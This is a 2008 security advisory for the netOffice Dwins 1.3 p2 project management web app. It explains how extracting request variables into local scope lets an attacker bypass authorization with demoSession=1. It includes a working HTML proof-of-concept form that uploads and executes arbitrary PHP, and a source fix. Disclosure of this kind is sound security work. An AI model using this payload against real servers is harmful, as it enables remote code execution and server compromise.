netOffice Dwins 1.3 Remote code execution.
--------------------------------------------------------

Product: netOffice Dwins
Version: 1.3 p2
Vendor:  http://netofficedwins.sourceforge.net/
Date:    02/29/08

- Introduction

"netOffice Dwins is a free web based time tracking, timesheet, and
project management environment."

- Details

It is possible for an attacker to bypass authorization, upload arbitrary
PHP files, and then execute them on the server.

netOffice extracts all GET, POST, SESSION, SERVER, and COOKIE parameters
into the local variable space.  This has the same effect as turning
on register globals.  The code below is from includes/library.php.

//GET array
    if (!empty($_GET)) {
        extract($_GET);
    } else if (!empty($HTTP_GET_VARS)) {
        extract($HTTP_GET_VARS);
    }

This lets an attacker set demoSession=1 to bypass authorization and
freely access any part of the application.  Setting the variable to one
bypasses the first check ($demoSession != true) but the second boolean
expression ($demoSession == 'true') evaluates to false thereby not
initializing the action variable to an empty string.

// check session validity, except for demo user
if (($checkSession == true) && ($demoSession != true)) {
    // a client user trying to get outside of the "client project site"
    if (($profilSession == 3) && (!strstr($_SERVER['PHP_SELF'],
'projects_site'))) {
        header('Location: ../index.php?session=false');
        exit;
    }

// disable actions if demo user logged in demo mode
if (!empty($action)) {
    if ($demoSession == 'true') {
	echo "true";
        $closeTopic = '';
        $addToSiteTask = '';
        $removeToSiteTask = '';
        $addToSiteTopic = '';
        $removeToSiteTopic = '';
        $addToSiteTeam = '';
        $removeToSiteTeam = '';
        $action = '';
        $msg = 'demo';
    }
}

Next an attacker could use access the uploadfile.php form without
logging in to upload and execute PHP files.  Normally php files are
not allowed unless the allowPhp variable is set to true.

- Proof of Concept

<form accept-charset="UNKNOWN" method="POST"
action="http://target/netoffice/projects_site/uploadfile.php?demoSession=1&allowPhp=true&action=add&amp;project=&amp;task=#filedetailsAnchor"
name="feeedback" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input
type="hidden" name="maxCustom" value="">
<table cellpadding="3" cellspacing="0" border="0">
<tr><th colspan="2">Upload Form</th></tr>
<tr><th>Comments :</th><td><textarea cols="60" name="commentsField"
rows="6"></textarea></td></tr>
<tr><th>Upload :</th><td><input size="35" value="" name="upload"
type="file"></td></tr>
<tr><th>&nbsp;</th><td><input name="submit" type="submit"
value="Save"><br><br></td></tr></table>
</form>

- Solution

Authors were notified on 2/19, no fix is currently available.  Edit
the source to prevent authorization bypass.

in includes/library.php change
	if ($demoSession == 'true') {
to
	if ($demoSession == true) {

Author: dB
Email: dB [at] rawsecurity.org